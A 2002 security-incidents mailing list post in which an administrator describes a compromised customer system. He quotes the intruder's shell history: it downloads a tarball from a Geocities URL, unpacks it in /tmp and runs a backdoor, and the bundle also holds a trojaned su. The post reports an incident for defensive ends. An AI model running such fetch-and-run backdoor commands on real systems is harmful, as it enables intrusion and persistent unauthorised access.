Security Incidents mailing list archives

Re: Rooted, .haos on system

From: Damian Gerow <damian () sentex net>
Date: 16 Dec 2002 13:47:28 -0500

On Mon, 2002-12-16 at 12:38, Damian Gerow wrote:
On Thu, 2002-12-12 at 18:50, Damian Gerow wrote:
I've just received word that one of our customers was rooted, and he's asking about the file ".haos".  Nothing
rings any bells, has anyone heard of it?

Just a quick update to this...

And one last tidbit...

Left in the .bash_history was this:

        cd /tmp
        wget www.geocities.com/Lebadash/loc.tgz; tar xvzf loc.tgz
        ./epc

A quick check tells me that 'epc' is a backdoor utility, and the other
file contained within loc.tgz looks like a trojaned 'su'.

I've already notified Geocities abuse, and haven't heard back from them
yet.